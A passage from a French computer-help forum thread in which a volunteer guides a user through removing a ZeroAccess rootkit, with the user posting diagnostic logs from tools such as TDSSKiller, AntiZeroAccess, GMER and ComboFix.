    23:38:14.0596 5248 \Device\Harddisk3\DR4 - ok
    23:38:14.0634 5248 Boot (0x1200) (34a2e9967311cd6e1f856515356082f8) \Device\Harddisk0\DR0\Partition0
    23:38:14.0634 5248 \Device\Harddisk0\DR0\Partition0 - ok
    23:38:14.0638 5248 Boot (0x1200) (73d0671b948f6ba74be5d5e36e216c29) \Device\Harddisk3\DR4\Partition0
    23:38:14.0639 5248 \Device\Harddisk3\DR4\Partition0 - ok
    23:38:14.0640 5248 ============================================================
    23:38:14.0640 5248 Scan finished
    23:38:14.0640 5248 ============================================================
    23:38:14.0650 4260 Detected object count: 1
    23:38:14.0650 4260 Actual detected object count: 1
    23:41:44.0779 4260 VerifyFileNameVersionInfo: GetFileVersionInfoSizeW(C:\Windows\system32\drivers\afd.sys) error 1813
    23:41:45.0542 4260 Backup copy not found, trying to cure infected file..
    23:41:45.0542 4260 C:\Windows\system32\drivers\afd.sys - Cure failed (FFFFFFFF)
    23:41:45.0542 4260 C:\Windows\system32\drivers\afd.sys - processing error
    23:41:45.0542 4260 AFD ( Rootkit.Win32.ZAccess.j ) - User select action: Cure
    23:42:00.0922 3792 Deinitialize success
    0
  11. moment de grace Messages postés 29099 Date d'inscription   Statut Contributeur sécurité Dernière intervention   2 274
     
    Téléchargeable depuis ce lien : http://anywhere.webrootcloudav.com/antizeroaccess.exe

    lance le
    Répondre Yes (oui) à la question, en tapant sur Y puis Entrée
    Si le fix trouve l'infection, des lignes rouges doivent apparaître.
    Le fix vous informe qu'un des fichiers systèmes a été patché et vous propose de le nettoyer.
    Tapez Y (oui) et Entrée pour lancer le nettoyage.
    Si l'opération a réussi, vous devez avoir le message Cleaned en vert.
    Appuyez sur une touche et redémarrer l'ordinateur.
    (Merci à Malekal pour ce tutoriel)
    0
  12. vincent3569 Messages postés 125 Statut Membre 4
     
    voici le rapport

    Webroot AntiZeroAccess 0.8 Log File
    Execution time: 10/11/2011 - 00:11
    Host operation System: Windows Seven X86 version 6.1.7601 Service Pack 1
    00:11:33 - CheckSystem - Begin to check system...
    00:11:33 - OpenRootDrive - Opening system root volume and physical drive....
    00:11:33 - C Root Drive: Disk number: 0 Start sector: 0x0198F000 Partition Size: 0x2CFA9800 sectors.
    00:11:33 - PrevX Main driver extracted in "C:\Windows\system32\drivers\ZeroAccess.sys".
    00:11:33 - InstallAndStartDriver - Main driver was installed and now is running.
    00:11:33 - CheckSystem - Disk class driver state is OK.
    00:11:38 - StopAndRemoveDriver - AntiZeroAccess Driver is stopped and removed.
    00:11:38 - StopAndRemoveDriver - File "ZeroAccess.sys" was deleted!
    00:11:38 - Execution Ended!
    0
    1. moment de grace Messages postés 29099 Date d'inscription   Statut Contributeur sécurité Dernière intervention   2 274
       
      Si l'opération a réussi, vous devez avoir le message Cleaned en vert.

      est ce la cas ?
      0
    2. vincent3569 Messages postés 125 Statut Membre 4
       
      de retour sur mon problème !
      je ne me souviens plus si j'ai eu un message vert (il me semble bien en tout cas)
      dans le doute, j'ai repassé AntiZeroAccess et j'ai un message vert qui me dit "your systém is not infected by ZeroAccess/Max+ Rootlit !

      j'attends vos instructions
      0
  13. vincent3569 Messages postés 125 Statut Membre 4
     
    hello
    je me permets un petit up sur mon problème.

    que dois-je maintenant ?
    0
    1. moment de grace Messages postés 29099 Date d'inscription   Statut Contributeur sécurité Dernière intervention   2 274
       
      as tu retrouvé internet ?
      0
    2. vincent3569 Messages postés 125 Statut Membre 4
       
      non, toujours pas
      comme mon antivirus montrait des signes d'incohérences (l'anti virus et le firewall étaient déconnectés, mais il n'y avait pas d'alerte particulière, et je ne pouvais pas les réactiver) je l'ai supprimé de mon PC. comme je suis toujours en connexion limitée, j'ai coupé le wifi pas sécurirté.

      est-ce qu'il n'y a pas un moyen pour vérifier si qq chose bloque l'accès wifi (firewall windows ou fire wall de ma box, ou autre)
      0
  14. moment de grace Messages postés 29099 Date d'inscription   Statut Contributeur sécurité Dernière intervention   2 274
     
    ton infection est la plus pourrie du moment et on gagne pas à chaque fois

    * Télécharge Defogger
    http://www.jpshortstuff.247fixes.com/Defogger.exe

    => lance le
    * Une fenêtre apparait clique sur Disable
    * Redémarre le PC si demandé

    ensuite

    /!\ Il faut impérativement désactiver tous tes logiciels de protection pour utiliser ce programme/!\

    ? Télécharge : Gmer (by Przemyslaw Gmerek)

    http://www.gmer.net/

    ? Dezippe gmer ,cliques sur l'onglet rootkit,lances le scan,des lignes rouges vont apparaitre.

    ? Les lignes rouges indiquent la presence d'un rootkit.Postes moi le rapport gmer (cliques sur copy,puis vas dans demarrer ,puis ouvres le bloc note,vas dans edition et cliques sur coller,le rapport gmer va apparaitre,postes moi le)
    0
  15. vincent3569 Messages postés 125 Statut Membre 4
     
    voici le rapport de gmer :

    GMER 1.0.15.15641 - http://www.gmer.net
    Rootkit scan 2011-11-11 21:43:45
    Windows 6.1.7601 Service Pack 1 Harddisk0\DR0 -> \Device\Ide\IAAStorageDevice-1 TOSHIBA_ rev.FF01
    Running: gmer.exe; Driver: C:\Users\Famille\AppData\Local\Temp\kxlciuod.sys

    ---- Kernel code sections - GMER 1.0.15 ----

    .text ntkrnlpa.exe!ZwSaveKey + 13D1 83683349 1 Byte [06]
    .text ntkrnlpa.exe!KiDispatchInterrupt + 5A2 836BCD52 19 Bytes [E0, 0F, BA, F0, 07, 73, 09, ...] {LOOPNZ 0x11; MOV EDX, 0x97307f0; MOV CR4, EAX; OR AL, 0x80; MOV CR4, EAX; RET ; MOV ECX, CR3}
    .PAGE1 C:\Windows\System32\DRIVERS\netbt.sys unknown last section [0x8B9F7A00, 0x100, 0xC0000040]

    ---- User IAT/EAT - GMER 1.0.15 ----

    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipAlloc] [74262437] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdiplusStartup] [74245600] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdiplusShutdown] [742456BE] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipFree] [742624B2] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipDeleteGraphics] [74258514] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipDisposeImage] [74254CC8] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipGetImageWidth] [7425506F] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipGetImageHeight] [74255144] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipCreateBitmapFromHBITMAP] [74256671] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipCreateFromHDC] [7425826B] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipSetCompositingMode] [742587BA] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipSetInterpolationMode] [7425901B] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipDrawImageRectI] [7425E1BE] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)
    IAT C:\Windows\Explorer.EXE[1600] @ C:\Windows\Explorer.EXE [gdiplus.dll!GdipCloneImage] [74254BFA] C:\Windows\WinSxS\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll (Microsoft GDI+/Microsoft Corporation)

    ---- Devices - GMER 1.0.15 ----

    AttachedDevice \Driver\kbdclass \Device\KeyboardClass0 Wdf01000.sys (Runtime de l'infrastructure de pilotes en mode noyau/Microsoft Corporation)
    AttachedDevice \Driver\kbdclass \Device\KeyboardClass1 Wdf01000.sys (Runtime de l'infrastructure de pilotes en mode noyau/Microsoft Corporation)

    Device \Driver\ACPI_HAL \Device\00000049 halmacpi.dll (Hardware Abstraction Layer DLL/Microsoft Corporation)

    AttachedDevice \Driver\volmgr \Device\HarddiskVolume1 fvevol.sys (BitLocker Drive Encryption Driver/Microsoft Corporation)
    AttachedDevice \Driver\volmgr \Device\HarddiskVolume2 fvevol.sys (BitLocker Drive Encryption Driver/Microsoft Corporation)
    AttachedDevice \Driver\volmgr \Device\HarddiskVolume3 fvevol.sys (BitLocker Drive Encryption Driver/Microsoft Corporation)
    AttachedDevice \Driver\volmgr \Device\HarddiskVolume4 fvevol.sys (BitLocker Drive Encryption Driver/Microsoft Corporation)
    AttachedDevice \Driver\volmgr \Device\HarddiskVolume7 fvevol.sys (BitLocker Drive Encryption Driver/Microsoft Corporation)
    AttachedDevice \FileSystem\fastfat \Fat fltmgr.sys (Gestionnaire de filtres de système de fichiers Microsoft/Microsoft Corporation)
    AttachedDevice \FileSystem\fastfat \Fat fltmgr.sys (Gestionnaire de filtres de système de fichiers Microsoft/Microsoft Corporation)

    Device \Driver\00000786 \GLOBAL??\41160ab2 87778880
    Device \Driver\00000780 \GLOBAL??\ACPI#PNP0303#2&da1a3ff&0 8773FB80

    ---- EOF - GMER 1.0.15 ----
    0
  16. vincent3569 Messages postés 125 Statut Membre 4
     
    voici le rapport de combofix

    ComboFix 11-11-11.06 - Famille 11/11/2011 22:27:45.4.2 - x86
    Microsoft Windows 7 Édition Familiale Premium 6.1.7601.1.1252.33.1036.18.3039.1807 [GMT 1:00]
    Lancé depuis: c:\users\Famille\Desktop\VINCENT.exe
    SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
    .
    .
    ((((((((((((((((((((((((((((( Fichiers créés du 2011-10-11 au 2011-11-11 ))))))))))))))))))))))))))))))))))))
    .
    .
    2011-11-11 21:31 . 2011-11-11 21:31 -------- d-----w- c:\users\Default\AppData\Local\temp
    2011-11-09 10:05 . 2011-11-09 10:05 -------- d-----w- c:\users\Famille\AppData\Local\ElevatedDiagnostics
    2011-11-08 21:26 . 2011-11-11 21:32 -------- d-----w- c:\users\Famille\AppData\Local\temp
    2011-11-08 21:08 . 2009-07-13 23:11 80896 ----a-w- c:\windows\system32\drivers\i8042prt.sys
    2011-11-08 18:15 . 2011-11-08 18:31 -------- d-----w- c:\users\Famille\AppData\Local\Microsoft Games
    2011-11-08 00:00 . 2011-11-10 23:45 111872 ----a-w- c:\windows\system32\drivers\TrueSight.sys
    2011-11-07 21:45 . 2011-11-08 20:30 -------- d-----w- C:\Kill'em
    2011-11-07 20:58 . 2011-11-07 20:58 -------- d-----w- c:\users\Famille\AppData\Roaming\Malwarebytes
    2011-11-07 20:58 . 2011-11-07 20:58 -------- d-----w- c:\programdata\Malwarebytes
    2011-11-07 20:58 . 2011-08-31 16:00 22216 ----a-w- c:\windows\system32\drivers\mbam.sys
    2011-11-07 20:58 . 2011-11-07 20:58 -------- d-----w- c:\program files\Malwarebytes' Anti-Malware
    2011-11-07 20:06 . 2011-11-07 20:06 110080 ----a-r- c:\users\Famille\AppData\Roaming\Microsoft\Installer\{1C7CC8E2-CFCF-41E6-A863-7C7A45CE8A78}\IconF7A21AF7.exe
    2011-11-07 20:06 . 2011-11-07 20:06 110080 ----a-r- c:\users\Famille\AppData\Roaming\Microsoft\Installer\{1C7CC8E2-CFCF-41E6-A863-7C7A45CE8A78}\IconD7F16134.exe
    2011-11-07 20:06 . 2011-11-07 20:06 110080 ----a-r- c:\users\Famille\AppData\Roaming\Microsoft\Installer\{1C7CC8E2-CFCF-41E6-A863-7C7A45CE8A78}\IconCF33A0CE.exe
    2011-11-07 20:05 . 2011-11-07 20:06 -------- d-----w- c:\windows\1C7CC8E2CFCF41E6A8637C7A45CE8A78.TMP
    2011-11-07 20:05 . 2011-11-07 20:05 -------- d-----w- c:\program files\Common Files\Wise Installation Wizard
    2011-11-07 14:29 . 2011-11-07 14:29 -------- d-sh--w- c:\windows\system32\%APPDATA%
    2011-10-13 16:23 . 2011-08-17 04:19 75776 ----a-w- c:\windows\system32\psisrndr.ax
    2011-10-13 16:22 . 2011-08-17 04:24 465408 ----a-w- c:\windows\system32\psisdecd.dll
    2011-10-13 16:20 . 2011-08-27 04:26 233472 ----a-w- c:\windows\system32\oleacc.dll
    2011-10-13 16:19 . 2011-08-27 04:26 571904 ----a-w- c:\windows\system32\oleaut32.dll
    2011-10-13 16:18 . 2011-09-06 02:28 2334720 ----a-w- c:\windows\system32\win32k.sys
    .
    .
    .
    (((((((((((((((((((((((((((((((((( Compte-rendu de Find3M ))))))))))))))))))))))))))))))))))))))))))))))))
    .
    2011-11-07 14:28 . 2008-12-16 17:40 388608 ----a-w- c:\windows\system32\drivers\XAudio.exe
    2011-11-07 14:28 . 2009-07-18 10:02 211488 ----a-w- c:\windows\system32\nvvsvc.exe
    2011-11-07 14:28 . 2008-12-16 10:01 102400 ----a-w- c:\windows\RTKAUDIOSERVICE.EXE
    2011-11-01 20:07 . 2011-06-23 06:29 414368 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
    2011-08-21 20:22 . 2011-08-21 20:22 18328 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
    2011-10-02 19:05 . 2011-03-24 05:38 134104 ----a-w- c:\program files\mozilla firefox\components\browsercomps.dll
    2011-04-14 12:01 . 2011-01-10 23:00 24376 ----a-w- c:\program files\mozilla firefox\components\Scriptff.dll
    .
    .
    ((((((((((((((((((((((((((((((((( Points de chargement Reg ))))))))))))))))))))))))))))))))))))))))))))))))
    .
    .
    *Note* les éléments vides & les éléments initiaux légitimes ne sont pas listés
    REGEDIT4
    .
    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "NSUFloatingUI"="c:\program files\Sony\Network Utility\LANUtil.exe" [2009-08-10 284592]
    "Sidebar"="c:\program files\Windows Sidebar\sidebar.exe" [2010-11-20 1174016]
    "msnmsgr"="c:\program files\Windows Live\Messenger\msnmsgr.exe" [2011-05-13 4283256]
    "NokiaOviSuite2"="c:\program files\Nokia\Nokia Ovi Suite\NokiaOviSuite.exe" [2011-01-31 703360]
    "TomTomHOME.exe"="c:\program files\TomTom HOME 2\TomTomHOMERunner.exe" [2011-03-09 247728]
    .
    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
    "NokiaMServer"="c:\program files\Common Files\Nokia\MPlatform\NokiaMServer" [X]
    "SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2007-03-10 835584]
    "RtHDVCpl"="RtHDVCpl.exe" [2008-10-17 6281760]
    "Google Desktop Search"="c:\program files\Google\Google Desktop Search\GoogleDesktop.exe" [2010-12-10 30192]
    "IAAnotif"="c:\program files\Intel\Intel Matrix Storage Manager\iaanotif.exe" [2008-04-15 178712]
    "ISBMgr.exe"="c:\program files\Sony\ISB Utility\ISBMgr.exe" [2009-05-26 317288]
    "MarketingTools"="c:\program files\Sony\Marketing Tools\MarketingTools.exe" [2010-12-10 24576]
    "AML"="c:\program files\Sony\VAIO Launcher\AML.exe" [2009-07-15 1101824]
    "NvCplDaemon"="c:\windows\system32\NvCpl.dll" [2009-07-18 13797920]
    "HP Software Update"="c:\program files\HP\HP Software Update\HPWuSchd2.exe" [2007-05-08 54840]
    "BCSSync"="c:\program files\Microsoft Office\Office14\BCSSync.exe" [2010-03-13 91520]
    "AdobeCS4ServiceManager"="c:\program files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" [2008-08-14 611712]
    "DivXUpdate"="c:\program files\DivX\DivX Update\DivXUpdate.exe" [2011-03-21 1230704]
    "Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2011-06-06 937920]
    .
    c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
    Bluetooth.lnk - c:\program files\WIDCOMM\Bluetooth Software\BTTray.exe [2009-7-1 795936]
    HP Digital Imaging Monitor.lnk - c:\program files\HP\Digital Imaging\bin\hpqtra08.exe [2009-5-21 275768]
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
    "ConsentPromptBehaviorAdmin"= 0 (0x0)
    "ConsentPromptBehaviorUser"= 3 (0x3)
    "EnableLUA"= 0 (0x0)
    "EnableUIADesktopToggle"= 0 (0x0)
    "PromptOnSecureDesktop"= 0 (0x0)
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon\notify\VESWinlogon]
    2009-08-04 07:58 98304 ----a-w- c:\windows\System32\VESWinlogon.dll
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\windows]
    "AppInit_DLLs"=c:\progra~1\Google\GOOGLE~1\GoogleDesktopNetwork3.dll
    .
    [HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa]
    Security Packages REG_MULTI_SZ kerberos msv1_0 schannel wdigest tspkg pku2u livessp
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
    @=""
    .
    R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-03-18 130384]
    R2 gupdate;Service Google Update (gupdate);c:\program files\Google\Update\GoogleUpdate.exe [2011-11-07 136176]
    R2 McMPFSvc;McAfee Personal Firewall Service;c:\program files\Common Files\Mcafee\McSvcHost\McSvHost.exe [x]
    R2 Roxio Upnp Server 10;Roxio Upnp Server 10;c:\program files\Roxio\Digital Home 10\RoxioUpnpService10.exe [2009-06-26 362992]
    R2 VAIO Power Management;VAIO Power Management;c:\program files\Sony\VAIO Power Management\SPMService.exe [2011-11-07 415592]
    R2 VCFw;VAIO Content Folder Watcher;c:\program files\Common Files\Sony Shared\VAIO Content Folder Watcher\VCFw.exe [2011-11-07 642920]
    R3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\DRIVERS\btwl2cap.sys [2009-08-21 29472]
    R3 GoogleDesktopManager-051210-111108;Google Desktop Manager 5.9.1005.12335;c:\program files\Google\Google Desktop Search\GoogleDesktop.exe [2010-12-10 30192]
    R3 gupdatem;Service Google Update (gupdatem);c:\program files\Google\Update\GoogleUpdate.exe [2011-11-07 136176]
    R3 JMCR_CFS;JMCR_CFS;c:\windows\system32\DRIVERS\jmcr_cfs.sys [2008-11-06 55696]
    R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\mbamswissarmy.sys [x]
    R3 Microsoft SharePoint Workspace Audit Service;Microsoft SharePoint Workspace Audit Service;c:\program files\Microsoft Office\Office14\GROOVE.EXE [2011-06-12 31125880]
    R3 nmwcdnsu;Nokia USB Flashing Phone Parent;c:\windows\system32\drivers\nmwcdnsu.sys [2010-07-26 137600]
    R3 nmwcdnsuc;Nokia USB Flashing Generic;c:\windows\system32\drivers\nmwcdnsuc.sys [2010-07-26 8576]
    R3 osppsvc;Office Software Protection Platform;c:\program files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE [2010-01-09 4640000]
    R3 Roxio UPnP Renderer 10;Roxio UPnP Renderer 10;c:\program files\Roxio\Digital Home 10\RoxioUPnPRenderer10.exe [2009-06-26 313840]
    R3 SOHCImp;VAIO Media plus Content Importer;c:\program files\Common Files\Sony Shared\SOHLib\SOHCImp.exe [2009-07-27 120104]
    R3 SOHDBSvr;VAIO Media plus Database Manager;c:\program files\Common Files\Sony Shared\SOHLib\SOHDBSvr.exe [2009-07-27 70952]
    R3 SOHDms;VAIO Media plus Digital Media Server;c:\program files\Common Files\Sony Shared\SOHLib\SOHDms.exe [2009-07-27 427304]
    R3 SOHDs;VAIO Media plus Device Searcher;c:\program files\Common Files\Sony Shared\SOHLib\SOHDs.exe [2009-07-27 75048]
    R3 SOHPlMgr;VAIO Media plus Playlist Manager;c:\program files\Common Files\Sony Shared\SOHLib\SOHPlMgr.exe [2009-07-27 91432]
    R3 TrueSight;TrueSight;c:\windows\system32\drivers\TrueSight.sys [2011-11-10 111872]
    R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
    R3 VcmIAlzMgr;VAIO Content Metadata Intelligent Analyzing Manager;c:\program files\Sony\VCM Intelligent Analyzing Manager\VcmIAlzMgr.exe [2009-09-16 480624]
    R3 VcmXmlIfHelper;VAIO Content Metadata XML Interface;c:\program files\Common Files\Sony Shared\VcmXml\VcmXmlIfHelper.exe [2009-09-08 83312]
    R3 VUAgent;VUAgent;c:\program files\Sony\VAIO Update Common\VUAgent.exe [2011-11-07 1086568]
    R3 WatAdminSvc;Service Windows Activation Technologies;c:\windows\system32\Wat\WatAdminSvc.exe [2010-12-10 1343400]
    R3 yukonw7;Pilote Miniport NDIS6.2 pour contrôleur Ethernet Marvell Yukon;c:\windows\system32\DRIVERS\yk62x86.sys [2009-07-13 311296]
    S2 AdobeARMservice;Adobe Acrobat Update Service;c:\program files\Common Files\Adobe\ARM\1.0\armsvc.exe [2011-11-07 64952]
    S2 NSUService;NSUService;c:\program files\sony\Network Utility\NSUService.exe [2011-11-07 307200]
    S2 regi;regi;c:\windows\system32\drivers\regi.sys [2007-04-17 11032]
    S2 RtkAudioService;Realtek Audio Service;c:\windows\RtkAudioService.exe [2011-11-07 102400]
    S2 TomTomHOMEService;TomTomHOMEService;c:\program files\TomTom HOME 2\TomTomHOMEService.exe [2011-11-07 92592]
    S2 uCamMonitor;CamMonitor;c:\program files\ArcSoft\Magic-i Visual Effects 2\uCamMonitor.exe [2011-11-07 104960]
    S3 ArcSoftKsUFilter;ArcSoft Magic-I Visual Effect;c:\windows\system32\DRIVERS\ArcSoftKsUFilter.sys [2008-04-24 17920]
    S3 netw5v32;Intel(R) Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 32 Bit;c:\windows\system32\DRIVERS\netw5v32.sys [2009-09-08 4231680]
    S3 NVHDA;Service for NVIDIA High Definition Audio Driver;c:\windows\system32\drivers\nvhda32v.sys [2010-12-10 66080]
    S3 SFEP;Sony Firmware Extension Parser;c:\windows\system32\DRIVERS\SFEP.sys [2008-08-22 9344]
    .
    .
    --- Autres Services/Pilotes en mémoire ---
    .
    *NewlyCreated* - KXLCIUOD
    *Deregistered* - kxlciuod
    .
    [HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
    HPService REG_MULTI_SZ HPSLPSVC
    HPZ12 REG_MULTI_SZ Pml Driver HPZ12 Net Driver HPZ12
    hpdevmgmt REG_MULTI_SZ hpqcxs08 hpqddsvc
    .
    Contenu du dossier 'Tâches planifiées'
    .
    2011-11-07 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
    - c:\program files\Google\Update\GoogleUpdate.exe [2010-12-10 18:15]
    .
    2011-11-07 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
    - c:\program files\Google\Update\GoogleUpdate.exe [2010-12-10 18:15]
    .
    .
    ------- Examen supplémentaire -------
    .
    uStart Page = about:blank
    uInternet Settings,ProxyOverride = *.local;<local>
    uSearchURL,(Default) = hxxp://www.google.com/search/?q=%s
    IE: &Envoyer à OneNote - c:\progra~1\MICROS~2\Office14\ONBttnIE.dll/105
    IE: Ajouter la cible du lien à un fichier PDF existant - c:\program files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
    IE: Ajouter à un fichier PDF existant - c:\program files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppend.html
    IE: Convertir au format Adobe PDF - c:\program files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECapture.html
    IE: Convertir la cible du lien au format Adobe PDF - c:\program files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
    IE: E&xporter vers Microsoft Excel - c:\progra~1\MICROS~2\Office14\EXCEL.EXE/3000
    IE: Envoyer au périphérique &Bluetooth... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
    IE: Envoyer l'&image au périphérique Bluetooth... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
    Trusted Zone: internet
    Trusted Zone: mcafee.com
    Trusted Zone: orange.fr\logicielsgratuits
    DPF: Garmin Communicator Plug-In - hxxps://static.garmincdn.com/gcp/ie/2.9.2.0/GarminAxControl.CAB
    DPF: {5A779DC0-837B-4590-AC42-C7C0847478C5} - hxxp://logicielsgratuits.orange.fr/download_service/Install/OrangeInstaller.cab
    FF - ProfilePath - c:\users\Famille\AppData\Roaming\Mozilla\Firefox\Profiles\xy1lb691.default\
    FF - prefs.js: browser.startup.homepage - hxxp://www.orange.fr/
    FF - prefs.js: network.proxy.type - 0
    .
    .
    ------- Associations de fichier -------
    .
    .txt=Notepad++_file
    .
    .
    --------------------- CLES DE REGISTRE BLOQUEES ---------------------
    .
    [HKEY_USERS\S-1-5-21-3456152527-1177042663-4229784714-1000\Software\SecuROM\License information*]
    "datasecu"=hex:63,8c,35,64,aa,e8,f1,71,5e,51,48,c8,f7,77,1c,b0,2c,a7,9b,cf,91,
    c7,04,4f,54,05,76,90,9c,9f,98,64,2c,b1,1b,70,c5,10,fa,a2,3f,67,d7,75,1c,af,\
    "rkeysecu"=hex:af,8c,59,f6,83,60,2f,ba,a0,0b,61,c9,c5,e7,32,68
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
    @Denied: (A) (Users)
    @Denied: (A) (Everyone)
    @Allowed: (B 1 2 3 4 5) (S-1-5-20)
    "BlindDial"=dword:00000000
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
    @Denied: (A) (Users)
    @Denied: (A) (Everyone)
    @Allowed: (B 1 2 3 4 5) (S-1-5-20)
    "BlindDial"=dword:00000000
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0002\AllUserSettings]
    @Denied: (A) (Users)
    @Denied: (A) (Everyone)
    @Allowed: (B 1 2 3 4 5) (S-1-5-20)
    "BlindDial"=dword:00000000
    .
    [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
    @Denied: (Full) (Everyone)
    .
    --------------------- DLLs chargées dans les processus actifs ---------------------
    .
    - - - - - - - > 'Explorer.exe'(5596)
    c:\program files\WIDCOMM\Bluetooth Software\btmmhook.dll
    .
    Heure de fin: 2011-11-11 22:33:10
    ComboFix-quarantined-files.txt 2011-11-11 21:33
    ComboFix2.txt 2011-11-10 23:56
    ComboFix3.txt 2011-11-08 22:21
    ComboFix4.txt 2011-11-08 21:34
    .
    Avant-CF: 245 732 470 784 octets libres
    Après-CF: 245 674 016 768 octets libres
    .
    - - End Of File - - B2B85CE6864E5FA8CDFF5102D7633151
    0
  17. moment de grace Messages postés 29099 Date d'inscription   Statut Contributeur sécurité Dernière intervention   2 274
     
    je vois rien

